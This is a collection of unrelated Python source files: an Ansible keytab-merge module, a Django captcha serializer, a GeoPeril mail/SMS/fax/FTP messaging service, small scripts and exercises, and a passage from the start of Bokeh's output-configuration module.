{"seq_id":"595985973","text":"#!/usr/bin/python\n# -*- coding=utf-8 -*-\n\"\"\"Copy keys from one keytab to another.\nCurrently, only the Heimdal implementation works\n\"\"\"\nfrom __future__ import unicode_literals\n\nfrom ansible.module_utils.basic import *\nimport os\nimport subprocess\n\n__author__ = 'mgallet'\nMIT_IMPL = 'mit'\nHEIMDAL_IMPL = 'heimdal'\n\n\ndef heimdal_copy_keytabs(src_path, dest_path):\n    dest_keys = set()\n    if os.path.isfile(dest_path):\n        dest_keys_data = subprocess.check_output(['ktutil', '-k', dest_path, 'list'])\n        dest_keys = {x.split()[2] for x in dest_keys_data.decode('utf-8').splitlines()[3:] if len(x.split()) > 2}\n    src_keys = set()\n    if 
os.path.isfile(src_path):\n        src_key_data = subprocess.check_output(['ktutil', '-k', src_path, 'list'])\n        src_keys = {x.split()[2] for x in src_key_data.decode('utf-8').splitlines()[3:] if len(x.split()) > 2}\n    if src_keys - dest_keys:\n        subprocess.check_output(['ktutil', 'copy', src_path, dest_path])\n\n\ndef main():\n    module = AnsibleModule(argument_spec={'src': {'required': True}, 'dest': {'required': True},\n                                         'impl': {'default': HEIMDAL_IMPL, 'choices': [MIT_IMPL, HEIMDAL_IMPL]}})\n    params = module.params\n    src_path = os.path.abspath(os.path.expanduser(params['src']))\n    dest_path = os.path.abspath(os.path.expanduser(params['dest']))\n    impl = params['impl']\n    if impl == MIT_IMPL:\n        raise ValueError('MIT not implemented yet')\n    if impl == HEIMDAL_IMPL:\n        heimdal_copy_keytabs(src_path=src_path, dest_path=dest_path)\n\nif __name__ == '__main__':\n    main()\n","sub_path":"penates/commands/library/merge_keytab.py","file_name":"merge_keytab.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
{"seq_id":"332599048","text":"import logging\n\nfrom django_redis import get_redis_connection\nfrom redis import RedisError\nfrom rest_framework import serializers\n\nlogger = logging.getLogger('meiduoshangcheng')\n\nclass RegisterSmsCodeSerializer(serializers.Serializer):\n    \"\"\"\n    Validate the captcha text and image_code_id\n    \"\"\"\n    text = serializers.CharField(label='captcha entered by the user', max_length=4, min_length=4, required=True)\n    image_code_id = serializers.UUIDField(label='unique id of the captcha')\n\n    def validate(self, attrs):\n        text = attrs['text']\n        image_code_id = attrs['image_code_id']\n\n        redis_conn = get_redis_connection('code')\n\n        # image_code_id may be a UUID, so it has to be converted with str() before string concatenation\n        # redis_text = redis_conn.get('img_' + image_code_id)\n\n        redis_text = redis_conn.get('img_%s'%image_code_id)\n\n        if redis_text is None:\n            raise serializers.ValidationError('image captcha has expired')\n\n        try:\n            redis_conn.delete('img_%s'%image_code_id)\n        except RedisError as e:\n            logger.error(e)\n\n        if redis_text.decode().lower() != text.lower():\n            raise serializers.ValidationError('captcha entered incorrectly')\n\n        return attrs","sub_path":"mall/apps/verifications/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
{"seq_id":"246172457","text":"\"\"\"\nBSD 2-Clause License\n\nCopyright (c) 2021, Nicola Severino Russi (nicola.russi@iit.it),\n                    Davide De Tommaso (davide.detommaso@iit.it)\n                    Social Cognition in Human-Robot Interaction\n                    Istituto Italiano di Tecnologia, Genova\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without\nmodification, are permitted provided that the following conditions are met:\n\n1. Redistributions of source code must retain the above copyright notice, this\n   list of conditions and the following disclaimer.\n\n2. Redistributions in binary form must reproduce the above copyright notice,\n   this list of conditions and the following disclaimer in the documentation\n   and/or other materials provided with the distribution.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\nDISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\nimport yarp\nimport random\nfrom random import randint\nimport time\n\n# create the network\nyarp.Network.init()\n\n# define port and bottle\nport = yarp.Port()\nbottle = yarp.Bottle()\n\n# activate port\nport.open(\"/producer\")\n\n# define port name to connect\nbuffer = \"/buffer_in\"\n\n# items to produce\nitemsToProduce = [\"apple\", \"orange\", \"pear\", \"banana\", \"kiwi\", \"watermelon\", \"peach\", \"grapes\",\"strawberry\"]\n\nprint(\"Producer writer started\")\nwhile itemsToProduce:\n # before writing check connection\n if yarp.Network.isConnected(port.getName(), buffer):\n # prepare the message\n bottle.clear()\n item = random.choice(itemsToProduce)\n itemsToProduce.remove(item)\n bottle.addString(item)\n # send message\n port.write(bottle)\n print (\"sended \", bottle.toString())\n time.sleep(randint(1,2))\n\n# deactivate ports\nport.close()\nprint(\"Producer writer ended\")\n\n# close the network\nyarp.Network.fini()\n","sub_path":"workdir/tutorials/producer-consumer/producer.py","file_name":"producer.py","file_ext":"py","file_size_in_byte":2493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"410753598","text":"# GeoPeril - A platform for the computation and web-mapping of hazard specific\n# geospatial data, as well as for serving functionality to handle, share, and\n# communicate threat specific information in a collaborative environment.\n#\n# Copyright (C) 2021 GFZ German Research Centre for Geosciences\n#\n# SPDX-License-Identifier: Apache-2.0\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the Licence is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the Licence for the specific language governing permissions and\n# limitations under the Licence.\n#\n# Contributors:\n# Johannes Spazier (GFZ)\n# Sven Reissland (GFZ)\n# Martin Hammitzsch (GFZ)\n# Matthias Rüster (GFZ)\n# Hannes Fuchs (GFZ)\n\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom email.utils import formatdate, make_msgid\nfrom xml.etree import ElementTree\nimport smtplib\nimport ftplib\nimport io\nimport os\nimport datetime\nimport copy\nimport logging\nimport requests\nimport cherrypy\nfrom cherrypy.lib.static import serve_file\nfrom basesrv import BaseSrv\nfrom base import jsfail, jsdeny, jssuccess, startapp\n\nlogger = logging.getLogger(\"MsgSrv\")\n\n\ndef sendmail(\n send_from,\n send_to,\n send_subject,\n send_text,\n send_cc=\"\",\n send_date=None,\n send_msgid=None\n):\n msg = MIMEMultipart()\n msg[\"From\"] = send_from\n if isinstance(send_to, str):\n msg[\"To\"] = send_to\n elif isinstance(send_to, list) and send_to != []:\n msg[\"To\"] = \", 
\".join(send_to)\n if isinstance(send_cc, str):\n msg[\"Cc\"] = send_cc\n elif isinstance(send_cc, list) and send_cc != []:\n msg[\"Cc\"] = \", \".join(send_cc)\n msg[\"Subject\"] = send_subject\n msg[\"Date\"] = formatdate() if send_date is None else send_date\n msg[\"Message-ID\"] = make_msgid() if send_msgid is None else send_msgid\n msg.attach(MIMEText(send_text, _charset='utf-8'))\n\n smtp = smtplib.SMTP('cgp1.gfz-potsdam.de')\n errors = []\n success = False\n try:\n res = smtp.send_message(msg)\n for key, val in res.items():\n errors.append((key, (val[0], val[1].decode('utf-8'))))\n success = True\n except smtplib.SMTPRecipientsRefused as ex:\n errors = {}\n for key, val in ex.recipients.items():\n errors.append((key, (val[0], val[1].decode('utf-8'))))\n except smtplib.SMTPSenderRefused as ex:\n errors = [(ex.sender, (ex.smtp_code, str(ex.smtp_error)))]\n success = None\n smtp.quit()\n print(\"Mail from\", msg[\"From\"], \"to\", msg[\"To\"], success, errors)\n return success, errors\n\n\ndef sendtwilliosms(twisid, twitoken, twifrom, sendto, text):\n if isinstance(sendto, str):\n errors = []\n success = []\n auth = requests.auth.HTTPBasicAuth(twisid, twitoken)\n payload = {}\n payload[\"To\"] = sendto.strip()\n payload[\"From\"] = twifrom\n payload[\"Body\"] = text\n req = requests.post(\n \"https://api.twilio.com/2010-04-01/Accounts/%s/Messages\" % twisid,\n data=payload,\n auth=auth\n )\n elm = ElementTree.fromstring(req.text)\n exc = elm.find(\"RestException\")\n if exc is None:\n for side in elm.iter(\"Sid\"):\n success.append((sendto, side.text))\n break\n else:\n errors.append(\n (sendto, ElementTree.tostring(exc, encoding='unicode'))\n )\n print(\n \"SMS from\", payload[\"From\"],\n \"to\", payload[\"To\"],\n success, errors\n )\n return success, errors\n if isinstance(sendto, list):\n errors = []\n success = []\n for sto in sendto:\n succ, err = sendtwilliosms(twisid, twitoken, twifrom, sto, text)\n errors += err\n success += succ\n return success, errors\n return None, None\n\n\nclass MsgSrv(BaseSrv):\n @cherrypy.expose\n @cherrypy.tools.allow(methods=['POST'])\n def instsms(self, apiver, inst, secret, username, to, text):\n if apiver == \"1\":\n inst = self._db[\"institutions\"].find_one({\n \"name\": inst,\n \"secret\": secret\n })\n if inst is not None and inst.get(\"instsms\", False):\n to = to.replace(\",\", \";\").split(\";\")\n user = self._db[\"users\"].find_one({\n \"username\": username\n })\n twisid = user[\"properties\"].get(\"TwilioSID\", \"\")\n twitoken = user[\"properties\"].get(\"TwilioToken\", \"\")\n twifrom = user[\"properties\"].get(\"TwilioFrom\", \"\")\n success, errors = sendtwilliosms(\n twisid, twitoken, twifrom, to, text\n )\n if success != []:\n return jssuccess(sentsmsids=success, errors=errors)\n return jsfail(errors=errors)\n return jsdeny()\n return jsfail(errors=[\"API version not supported.\"])\n\n @cherrypy.expose\n @cherrypy.tools.allow(methods=['POST'])\n def instmail(\n self, apiver, inst, secret,\n fromaddr, toaddr, subject, text, cc=\"\"\n ):\n if apiver == \"1\":\n inst = self._db[\"institutions\"].find_one({\n \"name\": inst,\n \"secret\": secret\n })\n if inst is not None and inst.get(\"instmail\", False):\n toaddr = toaddr.replace(\",\", \" \").replace(\";\", \" \").split()\n cc = cc.replace(\",\", \" \").replace(\";\", \" \").split()\n success, errors = sendmail(fromaddr, toaddr, subject, text, cc)\n if success:\n return jssuccess(errors=errors)\n return jsfail(errors=errors)\n return jsdeny()\n return jsfail(errors=[\"API version 
not supported.\"])\n\n @cherrypy.expose\n def readmsg(self, apiver, msgid):\n user = self.getUser()\n if user is not None:\n if apiver == \"1\":\n self._db[\"messages_received\"].update(\n {\n \"Message-ID\": msgid,\n \"ReadTime\": None,\n \"ReceiverID\": user[\"_id\"]\n },\n {\n \"$set\": {\"ReadTime\": datetime.datetime.utcnow()}\n }\n )\n msg = self._db[\"messages_received\"].find_one({\n \"Message-ID\": msgid,\n \"ReceiverID\": user[\"_id\"]\n })\n if msg is None:\n rtime = None\n else:\n rtime = msg[\"ReadTime\"].strftime(\"%b %d, %Y %I:%M:%S %p\")\n return jssuccess(readtime=rtime)\n return jsfail(errors=[\"API version not supported.\"])\n return jsdeny()\n\n @cherrypy.expose\n def displaymapmsg(self, apiver, msgid):\n user = self.getUser()\n if user is not None:\n if apiver == \"1\":\n self._db[\"messages_received\"].update(\n {\n \"Message-ID\": msgid,\n \"MapDisplayTime\": None,\n \"ReceiverID\": user[\"_id\"]\n },\n {\n \"$set\": {\"MapDisplayTime\": datetime.datetime.utcnow()}\n }\n )\n msg = self._db[\"messages_received\"].find_one({\n \"Message-ID\": msgid,\n \"ReceiverID\": user[\"_id\"]\n })\n if msg is None:\n mdtime = None\n else:\n mdtime = msg[\"MapDisplayTime\"] \\\n .strftime(\"%b %d, %Y %I:%M:%S %p\")\n return jssuccess(mapdisplaytime=mdtime)\n return jsfail(errors=[\"API version not supported.\"])\n return jsdeny()\n\n @cherrypy.expose\n @cherrypy.tools.allow(methods=['POST'])\n def intmsg(\n self, apiver, to, subject, text,\n evid=None, parentid=None, groupID=None, msgnr=None\n ):\n user = self.getUser()\n if user is not None and user[\"permissions\"].get(\"intmsg\", False):\n if apiver == \"1\":\n dbmsg = {\n \"Type\": \"INTERNAL\",\n \"SenderID\": user[\"_id\"],\n \"CreatedTime\": datetime.datetime.utcnow(),\n \"EventID\": evid,\n \"ParentId\": parentid,\n \"Message-ID\": make_msgid(),\n }\n if msgnr is not None:\n dbmsg[\"NextMsgNr\"] = int(msgnr)\n dbmsg[\"Text\"] = text\n dbmsg[\"Subject\"] = subject\n errors = []\n success = False\n send_to = to.replace(\",\", \" \").replace(\";\", \" \").split()\n for sto in send_to:\n ruser = self._db[\"users\"].find_one({\"username\": sto})\n if ruser is None:\n errors.append((sto, \"Unknown User %s\" % sto))\n else:\n success = True\n rmsg = copy.deepcopy(dbmsg)\n rmsg[\"ReceiverID\"] = ruser[\"_id\"]\n rmsg[\"ReadTime\"] = None\n rmsg[\"MapDisplayTime\"] = None\n self._db[\"messages_received\"].insert(rmsg)\n msgevt2 = {\n \"id\": rmsg[\"Message-ID\"],\n \"user\": rmsg[\"ReceiverID\"],\n \"timestamp\": dbmsg[\"CreatedTime\"],\n \"event\": \"msg_recv\",\n }\n self._db[\"events\"].insert(msgevt2)\n dbmsg[\"To\"] = send_to\n dbmsg[\"errors\"] = errors\n self._db[\"messages_sent\"].insert(dbmsg)\n msgevt = {\n \"id\": dbmsg[\"Message-ID\"],\n \"user\": dbmsg[\"SenderID\"],\n \"timestamp\": dbmsg[\"CreatedTime\"],\n \"event\": \"msg_sent\",\n }\n self._db[\"events\"].insert(msgevt)\n if success:\n return jssuccess(errors=errors)\n return jsfail(errors=errors)\n return jsfail(errors=[\"API version not supported.\"])\n return jsdeny()\n\n @cherrypy.expose\n @cherrypy.tools.allow(methods=['POST'])\n def mail(\n self, apiver, to, subject, text, cc=\"\",\n evid=None, parentid=None, groupID=None, msgnr=None\n ):\n user = self.getUser()\n if user is not None and user[\"permissions\"].get(\"mail\", False):\n if apiver == \"1\":\n dbmsg = {\n \"Type\": \"MAIL\",\n \"SenderID\": user[\"_id\"],\n \"CreatedTime\": datetime.datetime.utcnow(),\n \"EventID\": evid,\n \"ParentId\": parentid,\n }\n if msgnr is not None:\n dbmsg[\"NextMsgNr\"] 
= int(msgnr)\n send_from = user[\"username\"]\n send_to = to.replace(\",\", \" \").replace(\";\", \" \").split()\n send_cc = cc.replace(\",\", \" \").replace(\";\", \" \").split()\n send_subject = str(subject)\n send_text = str(text)\n send_date = formatdate()\n send_msgid = make_msgid()\n\n dbmsg[\"From\"] = send_from\n if send_to != []:\n dbmsg[\"To\"] = send_to\n if send_cc != []:\n dbmsg[\"Cc\"] = send_cc\n dbmsg[\"Subject\"] = send_subject\n dbmsg[\"Date\"] = send_date\n dbmsg[\"Message-ID\"] = send_msgid\n dbmsg[\"Text\"] = send_text\n\n success, errors = sendmail(\n send_from, send_to, send_subject,\n send_text, send_cc, send_date, send_msgid\n )\n if errors != [] and success is not None:\n errtext = \"There were errors while sending your Message.\\n\"\n for err in errors:\n errtext += \"\\n%s:\\t%d: %s\" % \\\n (err[0], err[1][0], err[1][1])\n sendmail(\n user[\"username\"],\n user[\"username\"],\n \"Error in mailing system\",\n errtext\n )\n\n dbmsg[\"errors\"] = errors\n self._db[\"messages_sent\"].insert(dbmsg)\n msgevt = {\n \"id\": dbmsg[\"Message-ID\"],\n \"user\": dbmsg[\"SenderID\"],\n \"timestamp\": dbmsg[\"CreatedTime\"],\n \"event\": \"msg_sent\",\n }\n self._db[\"events\"].insert(msgevt)\n\n if success:\n return jssuccess(errors=errors)\n return jsfail(errors=errors)\n return jsfail(errors=[\"API version not supported.\"])\n return jsdeny()\n\n @cherrypy.expose\n @cherrypy.tools.allow(methods=['POST'])\n def fax(\n self, apiver, to, text,\n evid=None, parentid=None, groupID=None, msgnr=None\n ):\n user = self.getUser()\n if user is not None and user[\"permissions\"].get(\"fax\", False):\n if apiver == \"1\":\n dbmsg = {\n \"Type\": \"FAX\",\n \"SenderID\": user[\"_id\"],\n \"CreatedTime\": datetime.datetime.utcnow(),\n \"EventID\": evid,\n \"ParentId\": parentid,\n \"Message-ID\": make_msgid(),\n }\n if msgnr is not None:\n dbmsg[\"NextMsgNr\"] = int(msgnr)\n to = to.replace(\",\", \";\").split(\";\")\n dbmsg[\"To\"] = to\n dbmsg[\"Text\"] = text\n errors = []\n success = []\n for fnr in to:\n payload = {}\n payload[\"Username\"] = user[\"properties\"] \\\n .get(\"InterfaxUsername\", \"\")\n payload[\"Password\"] = user[\"properties\"] \\\n .get(\"InterfaxPassword\", \"\")\n payload[\"FileType\"] = \"HTML\"\n payload[\"FaxNumber\"] = fnr\n payload[\"Data\"] = '
<html><body>' + text + \\n                        '</body></html>
    '\n req = requests.post(\n \"https://ws.interfax.net/dfs.asmx/SendCharFax\",\n data=payload\n )\n elm = ElementTree.fromstring(req.text)\n if int(elm.text) >= 0:\n success.append((fnr, elm.text))\n else:\n errors.append((fnr, elm.text))\n dbmsg[\"errors\"] = errors\n dbmsg[\"sentfaxids\"] = success\n self._db[\"messages_sent\"].insert(dbmsg)\n msgevt = {\n \"id\": dbmsg[\"Message-ID\"],\n \"user\": dbmsg[\"SenderID\"],\n \"timestamp\": dbmsg[\"CreatedTime\"],\n \"event\": \"msg_sent\",\n }\n self._db[\"events\"].insert(msgevt)\n if success != []:\n return jssuccess(sentfaxids=success, errors=errors)\n return jsfail(errors=errors)\n return jsfail(errors=[\"API version not supported.\"])\n return jsdeny()\n\n @cherrypy.expose\n @cherrypy.tools.allow(methods=['POST'])\n def sms(self, apiver, to, text, evid=None, parentid=None, groupID=None):\n user = self.getUser()\n if user is not None and user[\"permissions\"].get(\"sms\", False):\n if apiver == \"1\":\n dbmsg = {\n \"Type\": \"SMS\",\n \"SenderID\": user[\"_id\"],\n \"CreatedTime\": datetime.datetime.utcnow(),\n \"EventID\": evid,\n \"ParentId\": parentid,\n \"Message-ID\": make_msgid(),\n }\n to = to.replace(\",\", \";\").split(\";\")\n dbmsg[\"To\"] = to\n dbmsg[\"Text\"] = text\n\n twisid = user[\"properties\"].get(\"TwilioSID\", \"\")\n twitoken = user[\"properties\"].get(\"TwilioToken\", \"\")\n twifrom = user[\"properties\"].get(\"TwilioFrom\", \"\")\n success, errors = sendtwilliosms(\n twisid, twitoken, twifrom, to, text\n )\n\n dbmsg[\"sentsmsids\"] = success\n dbmsg[\"errors\"] = errors\n self._db[\"messages_sent\"].insert(dbmsg)\n msgevt = {\n \"id\": dbmsg[\"Message-ID\"],\n \"user\": dbmsg[\"SenderID\"],\n \"timestamp\": dbmsg[\"CreatedTime\"],\n \"event\": \"msg_sent\",\n }\n self._db[\"events\"].insert(msgevt)\n if success != []:\n return jssuccess(sentsmsids=success, errors=errors)\n return jsfail(errors=errors)\n return jsfail(errors=[\"API version not supported.\"])\n return jsdeny()\n\n @cherrypy.expose\n @cherrypy.tools.allow(methods=['POST'])\n def ftp(\n self, apiver, fname, text,\n evid=None, parentid=None, groupID=None, msgnr=None\n ):\n user = self.getUser()\n if user is not None and user[\"permissions\"].get(\"ftp\", False) and \\\n fname is not None and fname != \"\":\n if apiver == \"1\":\n dbmsg = {\n \"Type\": \"FTP\",\n \"SenderID\": user[\"_id\"],\n \"CreatedTime\": datetime.datetime.utcnow(),\n \"EventID\": evid,\n \"ParentId\": parentid,\n \"Message-ID\": make_msgid(),\n }\n if msgnr is not None:\n dbmsg[\"NextMsgNr\"] = int(msgnr)\n host = user[\"properties\"].get(\"FtpHost\", \"\")\n port = user[\"properties\"].get(\"FtpPort\", 21)\n path = user[\"properties\"].get(\"FtpPath\", \"\") + \"/\" + fname\n username = user[\"properties\"].get(\"FtpUser\", \"anonymous\")\n password = user[\"properties\"].get(\"FtpPassword\", \"anonymous\")\n dbmsg[\"To\"] = [\"%s@%s:%d%s\" % (username, host, port, path)]\n dbmsg[\"Text\"] = text\n error = None\n try:\n ftp = ftplib.FTP()\n ftp.connect(host, port)\n ftp.login(username, password)\n ftp.set_pasv(True)\n path = os.path.normpath(path)\n ftp.cwd(os.path.dirname(path))\n ftp.storbinary(\n \"STOR %s\" % os.path.basename(path),\n io.BytesIO(bytes(text, \"utf-8\"))\n )\n ftp.quit()\n except ftplib.all_errors as err:\n error = str(err)\n dbmsg[\"errors\"] = error\n self._db[\"messages_sent\"].insert(dbmsg)\n msgevt = {\n \"id\": dbmsg[\"Message-ID\"],\n \"user\": dbmsg[\"SenderID\"],\n \"timestamp\": dbmsg[\"CreatedTime\"],\n \"event\": \"msg_sent\",\n }\n 
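# also record the sent message in the events collection\n            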
self._db[\"events\"].insert(msgevt)\n if error is None:\n return jssuccess()\n return jsfail(errors=[error])\n return jsfail(errors=[\"API version not supported.\"])\n return jsdeny()\n\n\napplication = startapp(MsgSrv)\n","sub_path":"backend/wsgi/msgsrv.py","file_name":"msgsrv.py","file_ext":"py","file_size_in_byte":20215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"42"} +{"seq_id":"253200578","text":"__author__ = 'creeper'\n# import ez_setup\n# ez_setup.use_setuptools()\nfrom setuptools import setup,find_packages\n\nsetup(\n url=' ', \n name = 'django_analysis_tool',\n version = '1.1.21',\n description= 'Tools to analysis lab task',\n author = \"creeper\",\n author_email = 'creeper@163.com',\n packages = find_packages(),\n package_dir = {'': '.'},\n package_data = {\"\":[\"./db.sqlite3\",\n \"./manage.py\",\n \"./run.py\",\n \"./lab_analysis_tools/templates/lab_analysis_tools/*\",\n \"./lab/instrumentation_json/*\",\n \"./lab/static/index/css/*\",\n \"./lab/static/index/fonts/*\",\n \"./lab/static/index/img/*\",\n \"./lab/static/index/js/*\",\n \"./lab/static/task_all/css/*\",\n \"./lab/static/task_all/fonts/*\",\n \"./lab/static/task_all/js/*\",\n \"./lab/static/zip/css/*\",\n \"./lab/static/zip/fonts/*\",\n \"./lab/static/zip/js/*\",\n \"./lab/static/wait/_css/*\",\n \"./lab/static/wait/_scripts/*\"\n ]},\n scripts=[\"scripts/run.py\"],\n install_requires=[\n 'Django==1.9.4',\n 'threadpool==1.3.2',\n ],\n include_package_data = True\n)\n","sub_path":"pypi_install_script/django_analysis_tool-1.1.21/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"42"} +{"seq_id":"423970696","text":"import matplotlib.pyplot as plt\r\n\r\n\r\ndef sample1(request):\r\n plt.plot([3, 1, 4, 1, 5, 9, 2, 6, 5], label=\"Data 1\")\r\n plt.plot([3, 5, 8, 9, 7, 9, 3, 2, 3], label=\"Data 2\")\r\n plt.legend() # 凡例を表示\r\n plt.title(\"Graph Title\")\r\n plt.xlabel(\"X-axis\")\r\n plt.ylabel(\"Y-axis\")\r\n plt.show()\r\n return(request)\r\n","sub_path":"barep/report/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"42"} +{"seq_id":"124633515","text":"#!/usr/bin/env python3\nfrom jinja2 import Template\nimport cgi\n\npath = \"/Users/matthias.bothe/code/foundations/foundations-restaurants/restaurants.txt\"\ndata = open(path, \"r\")\nall_restaurants = data.read()\n\nclass Restaurant:\n\n def __init__(self, name, location):\n\n self.name = name\n self.location = location\n\n def getName(self):\n return self.name\n\n def getLocation(self):\n return self.location\n\ndef show_restaurants(all_restaurants):\n for line in all_restaurants:\n line = line[4:]\n name = line.split(\",\")[0]\n location = line.split(\",\")[1]\n restaurant = Restaurant(name, location)\n tm = Template(\"The name is {{ per.getName() }} and it is located in {{ per.getLocation() }}\")\n msg = tm.render(per=restaurant)\n print (\"\"\"\n\n\n \n Hello!\n \n \n \n \n \n \n \n \n \n
<p>{}.</p>
    \n Try again\n \n\n\"\"\".format(msg)\n )\n\ndata.close()","sub_path":"scripts/render-restaurants.py","file_name":"render-restaurants.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"42"} +{"seq_id":"17486930","text":"class Solution:\n def shortestDistance(self, words, word1, word2):\n \"\"\"\n :type words: List[str]\n :type word1: str\n :type word2: str\n :rtype: int\n \"\"\"\n min_distance, lookup = len(words), {}\n for i, v in enumerate(words):\n if v not in lookup:\n lookup[v] = {i}\n else:\n lookup[v].add(i)\n for i in lookup[word1]:\n for j in lookup[word2]:\n min_distance = min(min_distance, abs(j - i))\n return min_distance\n\nif __name__ == \"__main__\":\n solution = Solution()\n result = solution.shortestDistance([\"practice\", \"makes\", \"perfect\", \"coding\", \"makes\"], \"makes\", \"practice\")\n print(result)\n","sub_path":"200-300/243_shortest_word_distance.py","file_name":"243_shortest_word_distance.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"438109460","text":"#-----------------------------------------------------------------------------\n# Copyright (c) 2012 - 2015, Continuum Analytics, Inc. All rights reserved.\n#\n# Powered by the Bokeh Development Team.\n#\n# The full license is in the file LICENSE.txt, distributed with this software.\n#-----------------------------------------------------------------------------\n''' Functions for configuring Bokeh output.\n\n'''\n\n#-----------------------------------------------------------------------------\n# Imports\n#-----------------------------------------------------------------------------\nfrom __future__ import absolute_import\n\n# Stdlib imports\nimport logging\nlogger = logging.getLogger(__name__)\n\nimport io\nimport itertools\nimport json\nimport os\nimport warnings\n\n# Third-party imports\n\n# Bokeh imports\nfrom .core.state import State\nfrom .document import Document\nfrom .embed import notebook_div, standalone_html_page_for_models, autoload_server\nfrom .models import Component\nfrom .models.plots import GridPlot\nfrom .models.layouts import HBox, VBox, VBoxForm\nfrom .model import _ModelInDocument\nfrom .util.notebook import load_notebook, publish_display_data, get_comms\nfrom .util.string import decode_utf8\nfrom .util.serialization import make_id\nimport bokeh.util.browser as browserlib # full import needed for test mocking to work\nfrom .client import DEFAULT_SESSION_ID, push_session, show_session\n\n#-----------------------------------------------------------------------------\n# Globals and constants\n#-----------------------------------------------------------------------------\n\n_new_param = {'tab': 2, 'window': 1}\n\n_state = State()\n\n#-----------------------------------------------------------------------------\n# Local utilities\n#-----------------------------------------------------------------------------\n\n#-----------------------------------------------------------------------------\n# Classes and functions\n#-----------------------------------------------------------------------------\n\nclass _CommsHandle(object):\n\n _json = {}\n\n def __init__(self, comms, doc, json):\n self._cellno = None\n try:\n from IPython import get_ipython\n ip = get_ipython()\n hm = ip.history_manager\n p_prompt = list(hm.get_tail(1, include_latest=True))[0][1]\n self._cellno = p_prompt\n except Exception as e:\n 
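# getting the cell number is best effort; on any failure it is simply left unset\n            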
logger.debug(\"Could not get Notebook cell number, reason: %s\", e)\n\n self._comms = comms\n self._doc = doc\n self._json[doc] = json\n\n def _repr_html_(self):\n if self._cellno is not None:\n return \"
<Bokeh Notebook handle for In[%s]>\" % str(self._cellno)\n        else:\n            return \"<Bokeh Notebook handle>
    \"\n\n @property\n def comms(self):\n return self._comms\n\n @property\n def doc(self):\n return self._doc\n\n @property\n def json(self):\n return self._json[self._doc]\n\n def update(self, doc, json):\n self._doc = doc\n self._json[doc] = json\n\ndef output_file(filename, title=\"Bokeh Plot\", autosave=False, mode=\"cdn\", root_dir=None):\n '''Configure the default output state to generate output saved\n to a file when :func:`show` is called.\n\n Does not change the current Document from curdoc(). File,\n server, and notebook output may be active at the same time, so\n this does not clear the effects of output_server() or\n output_notebook().\n\n Args:\n filename (str) : a filename for saving the HTML document\n\n title (str, optional) : a title for the HTML document (default: \"Bokeh Plot\")\n\n autosave (bool, optional) : whether to automatically save (default: False)\n If True, then Bokeh plotting APIs may opt to automatically\n save the file more frequently (e.g., after any plotting\n command). If False, then the file is only saved upon calling\n :func:`show` or :func:`save`.\n\n mode (str, optional) : how to include BokehJS (default: ``'inline'``)\n One of: ``'inline'``, ``'cdn'``, ``'relative(-dev)'`` or\n ``'absolute(-dev)'``. See :class:`bokeh.resources.Resources` for more details.\n\n root_dir (str, optional) : root directory to use for 'absolute' resources. (default: None)\n This value is ignored for other resource types, e.g. ``INLINE`` or\n ``CDN``.\n\n Returns:\n None\n\n .. note::\n Generally, this should be called at the beginning of an interactive\n session or the top of a script.\n\n .. warning::\n This output file will be overwritten on every save, e.g., each time\n show() or save() is invoked, or any time a Bokeh plotting API\n causes a save, if ``autosave`` is True.\n\n '''\n _state.output_file(\n filename,\n title=title,\n autosave=autosave,\n mode=mode,\n root_dir=root_dir\n )\n\ndef output_notebook(resources=None, verbose=False, hide_banner=False):\n ''' Configure the default output state to generate output in\n Jupyter/IPython notebook cells when :func:`show` is called.\n\n If output_server() has also been called, the notebook cells\n are loaded from the configured server; otherwise, Bokeh pushes\n HTML to the notebook directly.\n\n Args:\n resources (Resource, optional) :\n How and where to load BokehJS from (default: INLINE)\n\n verbose (bool, optional) :\n whether to display detailed BokehJS banner (default: False)\n\n hide_banner (bool, optional):\n whether to hide the Bokeh banner (default: False)\n\n Returns:\n None\n\n .. note::\n Generally, this should be called at the beginning of an interactive\n session or the top of a script.\n\n '''\n load_notebook(resources, verbose, hide_banner)\n _state.output_notebook()\n\n# usually we default session_id to \"generate a random one\" but\n# here 